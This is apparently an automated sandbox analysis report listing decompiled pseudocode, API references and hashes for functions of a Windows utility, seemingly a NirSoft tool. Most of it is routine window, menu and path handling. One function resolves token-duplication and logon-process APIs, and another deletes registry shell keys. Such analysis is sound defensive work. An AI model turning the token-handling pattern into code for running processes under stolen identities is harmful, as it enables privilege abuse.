                                                                                                                • API ID: memset$_snwprintf
                                                                                                                • String ID: %%0.%df
                                                                                                                • API String ID: 3473751417-763548558
                                                                                                                • Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                                • Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
                                                                                                                • Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                                • Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 51%
                                                                                                                			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
                                                                                                                				void _v8202;
                                                                                                                				short _v8204;
                                                                                                                				void* _t27;
                                                                                                                				short _t29;
                                                                                                                				short _t40;
                                                                                                                				void* _t41;
                                                                                                                				struct HMENU__* _t43;
                                                                                                                				short _t50;
                                                                                                                				void* _t52;
                                                                                                                				struct HMENU__* _t59;
                                                                                                                
                                                                                                                				E0040B550(0x2008, __ecx);
                                                                                                                				_t65 = _a8 - 4;
                                                                                                                				if(_a8 != 4) {
                                                                                                                					__eflags = _a8 - 5;
                                                                                                                					if(_a8 == 5) {
                                                                                                                						_t50 =  *0x40fe2c; // 0x0
                                                                                                                						__eflags = _t50;
                                                                                                                						if(_t50 == 0) {
                                                                                                                							L8:
                                                                                                                							_push(_a12);
                                                                                                                							_t27 = 5;
                                                                                                                							E00405E8D(_t27);
                                                                                                                							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
                                                                                                                							__eflags = _t29;
                                                                                                                							_a8 = _t29;
                                                                                                                							if(_t29 == 0) {
                                                                                                                								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
                                                                                                                							}
                                                                                                                							_v8204 = 0;
                                                                                                                							memset( &_v8202, 0, 0x2000);
                                                                                                                							GetWindowTextW(_a8,  &_v8204, 0x1000);
                                                                                                                							__eflags = _v8204;
                                                                                                                							if(__eflags != 0) {
                                                                                                                								E00405FAC(__eflags, L"caption",  &_v8204, 0);
                                                                                                                							}
                                                                                                                							EnumChildWindows(_a8, E0040614F, 0);
                                                                                                                							DestroyWindow(_a8);
                                                                                                                						} else {
                                                                                                                							while(1) {
                                                                                                                								_t40 =  *_t50;
                                                                                                                								__eflags = _t40;
                                                                                                                								if(_t40 == 0) {
                                                                                                                									goto L8;
                                                                                                                								}
                                                                                                                								__eflags = _t40 - _a12;
                                                                                                                								if(_t40 != _a12) {
                                                                                                                									_t50 = _t50 + 4;
                                                                                                                									__eflags = _t50;
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                								goto L13;
                                                                                                                							}
                                                                                                                							goto L8;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_push(_a12);
                                                                                                                					_t41 = 4;
                                                                                                                					E00405E8D(_t41);
                                                                                                                					_pop(_t52);
                                                                                                                					_t43 = LoadMenuW(_a4, _a12);
                                                                                                                					 *0x40fe20 =  *0x40fe20 & 0x00000000;
                                                                                                                					_t59 = _t43;
                                                                                                                					_push(1);
                                                                                                                					_push(_t59);
                                                                                                                					_push(_a12);
                                                                                                                					E0040605E(_t52, _t65);
                                                                                                                					DestroyMenu(_t59);
                                                                                                                				}
                                                                                                                				L13:
                                                                                                                				return 1;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • LoadMenuW.USER32 ref: 00406236
                                                                                                                  • Part of subcall function 0040605E: GetMenuItemCount.USER32 ref: 00406074
                                                                                                                  • Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
                                                                                                                  • Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
                                                                                                                  • Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7
                                                                                                                • DestroyMenu.USER32(00000000), ref: 00406254
                                                                                                                • CreateDialogParamW.USER32 ref: 004062A9
                                                                                                                • GetDesktopWindow.USER32 ref: 004062B4
                                                                                                                • CreateDialogParamW.USER32 ref: 004062C1
                                                                                                                • memset.MSVCRT ref: 004062DA
                                                                                                                • GetWindowTextW.USER32 ref: 004062F1
                                                                                                                • EnumChildWindows.USER32 ref: 0040631E
                                                                                                                • DestroyWindow.USER32(00000005), ref: 00406327
                                                                                                                  • Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                • String ID: caption
                                                                                                                • API String ID: 973020956-4135340389
                                                                                                                • Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                                • Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
                                                                                                                • Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                                • Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 65%
                                                                                                                			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				void _v2050;
                                                                                                                				char _v2052;
                                                                                                                				void _v4098;
                                                                                                                				long _v4100;
                                                                                                                				void _v6146;
                                                                                                                				char _v6148;
                                                                                                                				void* __esi;
                                                                                                                				void* _t43;
                                                                                                                				intOrPtr* _t49;
                                                                                                                				intOrPtr* _t57;
                                                                                                                				void* _t58;
                                                                                                                				void* _t59;
                                                                                                                				intOrPtr _t62;
                                                                                                                				intOrPtr _t63;
                                                                                                                
                                                                                                                				_t49 = __ecx;
                                                                                                                				E0040B550(0x1800, __ecx);
                                                                                                                				_t57 = _t49;
                                                                                                                				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
                                                                                                                				_v4100 = 0;
                                                                                                                				memset( &_v4098, 0, 0x7fe);
                                                                                                                				_v2052 = 0;
                                                                                                                				memset( &_v2050, 0, 0x7fe);
                                                                                                                				_v6148 = 0;
                                                                                                                				memset( &_v6146, 0, 0x7fe);
                                                                                                                				_t59 = _t58 + 0x24;
                                                                                                                				_t62 =  *0x40fe30; // 0x0
                                                                                                                				if(_t62 != 0) {
                                                                                                                					_push(0x40fe30);
                                                                                                                					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
                                                                                                                					_push(0x400);
                                                                                                                					_push( &_v2052);
                                                                                                                					L0040B1EC();
                                                                                                                					_t59 = _t59 + 0x10;
                                                                                                                				}
                                                                                                                				_t63 =  *0x40fe28; // 0x0
                                                                                                                				if(_t63 != 0) {
                                                                                                                					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
                                                                                                                				}
                                                                                                                				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
                                                                                                                				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
                                                                                                                				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
                                                                                                                				_push(0x400);
                                                                                                                				_push( &_v6148);
                                                                                                                				L0040B1EC();
                                                                                                                				_t43 = E00407343(_t57, _a4,  &_v6148);
                                                                                                                				_t64 = _a8 - 5;
                                                                                                                				if(_a8 == 5) {
                                                                                                                					return E00407D03(_t57, _t64, _a4);
                                                                                                                				}
                                                                                                                				return _t43;
                                                                                                                			}


















                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • <table dir="rtl"><tr><td>, xrefs: 00408284
                                                                                                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4
                                                                                                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6
                                                                                                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf$wcscpy
                                                                                                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                • API String ID: 1283228442-2366825230
                                                                                                                • Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                                • Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
                                                                                                                • Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                                • Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 85%
                                                                                                                			E0040920A(wchar_t* __edi, wchar_t* __esi) {
                                                                                                                				void _v526;
                                                                                                                				long _v528;
                                                                                                                				wchar_t* _t17;
                                                                                                                				signed int _t40;
                                                                                                                				wchar_t* _t50;
                                                                                                                
                                                                                                                				_t50 = __edi;
                                                                                                                				if(__esi[0] != 0x3a) {
                                                                                                                					_t17 = wcschr( &(__esi[1]), 0x3a);
                                                                                                                					if(_t17 == 0) {
                                                                                                                						_t40 = E0040488D(__esi, L"\\systemroot");
                                                                                                                						if(_t40 < 0) {
                                                                                                                							if( *__esi != 0x5c) {
                                                                                                                								wcscpy(__edi, __esi);
                                                                                                                							} else {
                                                                                                                								_v528 = 0;
                                                                                                                								memset( &_v526, 0, 0x208);
                                                                                                                								E00404C08( &_v528);
                                                                                                                								memcpy(__edi,  &_v528, 4);
                                                                                                                								__edi[1] = __edi[1] & 0x00000000;
                                                                                                                								wcscat(__edi, __esi);
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							_v528 = 0;
                                                                                                                							memset( &_v526, 0, 0x208);
                                                                                                                							E00404C08( &_v528);
                                                                                                                							wcscpy(__edi,  &_v528);
                                                                                                                							wcscat(__edi, __esi + 0x16 + _t40 * 2);
                                                                                                                						}
                                                                                                                						L11:
                                                                                                                						return _t50;
                                                                                                                					}
                                                                                                                					_push( &(_t17[0]));
                                                                                                                					L4:
                                                                                                                					wcscpy(_t50, ??);
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                				_push(__esi);
                                                                                                                				goto L4;
                                                                                                                 			}

                                                                                                                APIs
                                                                                                                • wcschr.MSVCRT ref: 00409223
                                                                                                                • wcscpy.MSVCRT ref: 00409233
                                                                                                                  • Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
                                                                                                                  • Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
                                                                                                                  • Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1
                                                                                                                • wcscpy.MSVCRT ref: 00409282
                                                                                                                • wcscat.MSVCRT ref: 0040928D
                                                                                                                • memset.MSVCRT ref: 00409269
                                                                                                                  • Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
                                                                                                                  • Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E
                                                                                                                • memset.MSVCRT ref: 004092B1
                                                                                                                • memcpy.MSVCRT ref: 004092CC
                                                                                                                • wcscat.MSVCRT ref: 004092D8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                • String ID: \systemroot
                                                                                                                • API String ID: 4173585201-1821301763
                                                                                                                • Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                                • Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
                                                                                                                • Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                                • Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 48%
                                                                                                                			E00409C70(signed int* _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				_Unknown_base(*)()* _v12;
                                                                                                                				char* _v16;
                                                                                                                				int _v18;
                                                                                                                				signed int _v20;
                                                                                                                				char _v36;
                                                                                                                				intOrPtr* _t21;
                                                                                                                				struct HINSTANCE__* _t22;
                                                                                                                				signed int _t23;
                                                                                                                				signed int _t24;
                                                                                                                				_Unknown_base(*)()* _t26;
                                                                                                                				char* _t28;
                                                                                                                				int _t31;
                                                                                                                
                                                                                                                				_t21 = _a4;
                                                                                                                				if( *_t21 == 0) {
                                                                                                                					_t22 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                					_v8 = _t22;
                                                                                                                					_t23 = GetProcAddress(_t22, "GetProcAddress");
                                                                                                                					 *_a4 = _t23;
                                                                                                                					_t24 = _t23 ^ _v8;
                                                                                                                					if((_t24 & 0xfff00000) != 0) {
                                                                                                                						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
                                                                                                                						_v20 = _v20 & 0x00000000;
                                                                                                                						_v12 = _t26;
                                                                                                                						asm("stosd");
                                                                                                                						asm("stosw");
                                                                                                                						asm("movsd");
                                                                                                                						asm("movsd");
                                                                                                                						asm("movsd");
                                                                                                                						asm("movsw");
                                                                                                                						_t28 =  &_v36;
                                                                                                                						asm("movsb");
                                                                                                                						_v16 = _t28;
                                                                                                                						_v20 = strlen(_t28);
                                                                                                                						_t31 = strlen( &_v36);
                                                                                                                						_v18 = _t31;
                                                                                                                						_t24 = _v12(_v8,  &_v20, 0, _a4);
                                                                                                                					}
                                                                                                                					return _t24;
                                                                                                                				}
                                                                                                                				return _t21;
                                                                                                                 			}

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                                • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                                • strlen.MSVCRT ref: 00409CE4
                                                                                                                • strlen.MSVCRT ref: 00409CF1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProcstrlen
                                                                                                                • String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
                                                                                                                • API String ID: 1027343248-2054640941
                                                                                                                • Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                                • Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
                                                                                                                • Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                                • Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040289F(intOrPtr* __esi) {
                                                                                                                				void* _t9;
                                                                                                                				struct HINSTANCE__* _t10;
                                                                                                                				_Unknown_base(*)()* _t14;
                                                                                                                
                                                                                                                				if( *(__esi + 0x10) == 0) {
                                                                                                                					_t10 = LoadLibraryW(L"advapi32.dll");
                                                                                                                					 *(__esi + 0x10) = _t10;
                                                                                                                					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
                                                                                                                					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
                                                                                                                					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
                                                                                                                					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
                                                                                                                					 *(__esi + 8) = _t14;
                                                                                                                					return _t14;
                                                                                                                				}
                                                                                                                				return _t9;
                                                                                                                 			}

                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                                • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                                • GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                • String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 39%
                                                                                                                			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
                                                                                                                				void* _v8;
                                                                                                                				void _v2054;
                                                                                                                				short _v2056;
                                                                                                                				void _v4102;
                                                                                                                				short _v4104;
                                                                                                                				signed int _t28;
                                                                                                                				void* _t34;
                                                                                                                
                                                                                                                				E0040B550(0x1004, __ecx);
                                                                                                                				_t36 = 0;
                                                                                                                				if(E004043F8( &_v8, 0x2001f) == 0) {
                                                                                                                					_v2056 = 0;
                                                                                                                					memset( &_v2054, 0, 0x7fe);
                                                                                                                					_v4104 = 0;
                                                                                                                					memset( &_v4102, 0, 0x7fe);
                                                                                                                					_t34 = __ebx + 0x20a;
                                                                                                                					_push(_t34);
                                                                                                                					_push(__ebx);
                                                                                                                					_push(L"%s\\shell\\%s\\command");
                                                                                                                					_push(0x3ff);
                                                                                                                					_push( &_v2056);
                                                                                                                					L0040B1EC();
                                                                                                                					_push(_t34);
                                                                                                                					_push(__ebx);
                                                                                                                					_push(L"%s\\shell\\%s");
                                                                                                                					_push(0x3ff);
                                                                                                                					_push( &_v4104);
                                                                                                                					L0040B1EC();
                                                                                                                					RegDeleteKeyW(_v8,  &_v2056);
                                                                                                                					_t28 = RegDeleteKeyW(_v8,  &_v4104);
                                                                                                                					asm("sbb esi, esi");
                                                                                                                					_t36 =  ~_t28 + 1;
                                                                                                                					RegCloseKey(_v8);
                                                                                                                				}
                                                                                                                				return _t36;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Delete_snwprintfmemset$Close
                                                                                                                • String ID: %s\shell\%s$%s\shell\%s\command
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 58%
                                                                                                                			E0040313D(void* __ecx) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				char _v12;
                                                                                                                				struct HWND__* _t6;
                                                                                                                				_Unknown_base(*)()* _t11;
                                                                                                                				struct HWND__* _t15;
                                                                                                                				void* _t20;
                                                                                                                				struct HINSTANCE__* _t23;
                                                                                                                
                                                                                                                				_v12 = 8;
                                                                                                                				_v8 = 0xff;
                                                                                                                				_t15 = 0;
                                                                                                                				_t20 = 0;
                                                                                                                				_t23 = LoadLibraryW(L"comctl32.dll");
                                                                                                                				if(_t23 == 0) {
                                                                                                                					L5:
                                                                                                                					__imp__#17();
                                                                                                                					_t6 = 1;
                                                                                                                					L6:
                                                                                                                					if(_t6 != 0) {
                                                                                                                						return 1;
                                                                                                                					} else {
                                                                                                                						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
                                                                                                                						return 0;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
                                                                                                                				if(_t11 != 0) {
                                                                                                                					_t20 = 1;
                                                                                                                					_t15 =  *_t11( &_v12);
                                                                                                                				}
                                                                                                                				FreeLibrary(_t23);
                                                                                                                				if(_t20 == 0) {
                                                                                                                					goto L5;
                                                                                                                				} else {
                                                                                                                					_t6 = _t15;
                                                                                                                					goto L6;
                                                                                                                				}
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                                • #17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
                                                                                                                • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 85%
                                                                                                                			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
                                                                                                                				struct HWND__* _v8;
                                                                                                                				struct HWND__* _v12;
                                                                                                                				struct tagRECT _v28;
                                                                                                                				struct tagRECT _v44;
                                                                                                                				int _t50;
                                                                                                                				long _t61;
                                                                                                                				struct HDC__* _t63;
                                                                                                                				intOrPtr _t65;
                                                                                                                				intOrPtr _t68;
                                                                                                                				struct HWND__* _t71;
                                                                                                                				intOrPtr _t72;
                                                                                                                				void* _t73;
                                                                                                                				int _t74;
                                                                                                                				int _t80;
                                                                                                                				int _t83;
                                                                                                                
                                                                                                                				_t73 = __edx;
                                                                                                                				_v8 = 0;
                                                                                                                				_v12 = 0;
                                                                                                                				_t74 = GetSystemMetrics(0x11);
                                                                                                                				_t80 = GetSystemMetrics(0x10);
                                                                                                                				if(_t74 == 0 || _t80 == 0) {
                                                                                                                					_t63 = GetDC(0);
                                                                                                                					_t80 = GetDeviceCaps(_t63, 8);
                                                                                                                					_t74 = GetDeviceCaps(_t63, 0xa);
                                                                                                                					ReleaseDC(0, _t63);
                                                                                                                				}
                                                                                                                				GetWindowRect(_a4,  &_v44);
                                                                                                                				if((_a8 & 0x00000004) != 0) {
                                                                                                                					_t71 = GetParent(_a4);
                                                                                                                					if(_t71 != 0) {
                                                                                                                						_v28.left = _v28.left & 0x00000000;
                                                                                                                						asm("stosd");
                                                                                                                						asm("stosd");
                                                                                                                						asm("stosd");
                                                                                                                						GetWindowRect(_t71,  &_v28);
                                                                                                                						_t61 = _v28.left;
                                                                                                                						_t72 = _v28.top;
                                                                                                                						_t80 = _v28.right - _t61 + 1;
                                                                                                                						_t74 = _v28.bottom - _t72 + 1;
                                                                                                                						_v8 = _t61;
                                                                                                                						_v12 = _t72;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t65 = _v44.right;
                                                                                                                				if((_a8 & 0x00000001) == 0) {
                                                                                                                					asm("cdq");
                                                                                                                					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
                                                                                                                				} else {
                                                                                                                					_t83 = 0;
                                                                                                                				}
                                                                                                                				_t68 = _v44.bottom;
                                                                                                                				if((_a8 & 0x00000002) != 0) {
                                                                                                                					L11:
                                                                                                                					_t50 = 0;
                                                                                                                					goto L12;
                                                                                                                				} else {
                                                                                                                					asm("cdq");
                                                                                                                					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
                                                                                                                					if(_t50 >= 0) {
                                                                                                                						L12:
                                                                                                                						if(_t83 < 0) {
                                                                                                                							_t83 = 0;
                                                                                                                						}
                                                                                                                						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
                                                                                                                					}
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                			}



















                                                                                                                APIs
                                                                                                                • GetSystemMetrics.USER32 ref: 00404DC2
                                                                                                                • GetSystemMetrics.USER32 ref: 00404DC8
                                                                                                                • GetDC.USER32(00000000), ref: 00404DD5
                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
                                                                                                                • ReleaseDC.USER32 ref: 00404DF4
                                                                                                                • GetWindowRect.USER32 ref: 00404E07
                                                                                                                • GetParent.USER32(?), ref: 00404E12
                                                                                                                • GetWindowRect.USER32 ref: 00404E2F
                                                                                                                • MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 2163313125-0
